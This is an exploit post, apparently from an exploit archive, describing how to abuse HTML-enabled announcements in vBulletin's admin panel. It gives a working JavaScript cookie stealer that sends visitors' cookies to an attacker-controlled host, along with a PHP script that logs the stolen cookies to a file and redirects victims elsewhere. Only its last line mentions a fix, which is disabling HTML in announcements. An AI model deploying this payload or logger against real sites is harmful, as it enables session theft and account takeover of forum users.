vBulletin Announcements, by default has html enabled, so if you get access to a forum using other exploits and get a user with acp info, but it only has default admin cp permissions (moderator access and announcements), you can inject a cookie stealer and steal other users informations.
admincp>announcements>create a new one>put some random announcemnt + this code:
<script language="JavaScript">
document.location= " http://www.yoursite.com/cookie.php?p=" + document.cookie; </script>
and in your site put this and name it cookie.php
<?php
$cookie = $HTTP_GET_VARS[" p"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='http://www.google.com';</script>";
?>
If you're the owner, a "fix" for this is disallow html in announcements.
# 1337day.com [2012-12-16]
